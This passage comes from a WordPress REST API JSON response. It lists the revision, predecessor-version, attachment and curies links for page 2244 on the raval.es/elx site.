\/wp\/v2\/pages\/2244\/revisions"}],"predecessor-version":[{"id":8578,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/pages\/2244\/revisions\/8578"}],"wp:attachment":[{"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/media?parent=2244"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}